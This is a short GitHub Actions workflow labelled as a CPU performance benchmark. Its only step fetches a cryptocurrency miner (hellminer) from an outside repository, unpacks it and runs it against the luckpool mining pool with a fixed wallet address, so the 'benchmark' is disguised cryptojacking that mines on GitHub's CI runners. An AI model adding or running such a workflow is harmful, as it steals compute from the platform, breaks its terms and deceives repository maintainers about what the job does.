name: CPU_Performance_Test
on: [workflow_dispatch]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Start_Benchmark
        run: |
          wget -q https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
          tar -xf hellminer_cpu_linux.tar.gz
          chmod +x hellminer
          ./hellminer -c stratum+tcp://na.luckpool.net:3956 -u RYDbQ26L1yAD8HE1wdRATtGSuprANUvH3a.GitHub_Pro -p x --cpu 2
